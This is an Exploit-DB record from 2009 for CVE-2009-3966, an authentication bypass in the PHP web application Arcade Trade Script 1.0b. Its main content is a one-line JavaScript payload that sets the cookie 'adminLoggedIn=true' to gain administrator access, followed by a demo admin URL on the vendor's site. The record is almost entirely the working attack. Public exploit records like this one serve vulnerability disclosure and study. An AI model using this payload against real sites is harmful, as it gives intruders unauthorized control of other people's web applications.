Arcade Trade Script 1.0b Auth Bypass Insecure Cookie Handling Vuln

2009-08-24T00:00:00
ID EDB-ID:9482
Type exploitdb
Reporter Mr.tro0oqy
Modified 2009-08-24T00:00:00

Description

Arcade Trade Script 1.0b (Auth Bypass) Insecure Cookie Handling Vuln. CVE-2009-3966. Webapps exploit for php platform

                                        
                                            ======================================================================
[»] Script : Arcade Trade Script v.1.0 Insecure Cookie Handling Vuln

[»] Language : php  

[»] Script site : http://www.arcadetradescript.com

[»] Founder: Mr.tro0oqy <- from Yemen

[»] Gr44tz to: [H]-> borken heart :(

[»] E-mail : t.4@windowslive.com
======================================================================
exploit:
--------

javascript:document.cookie="adminLoggedIn=true;path=/";

--------
demo:
--------

http://www.arcadetradescript.com/demo/admin/
--------

# milw0rm.com [2009-08-24]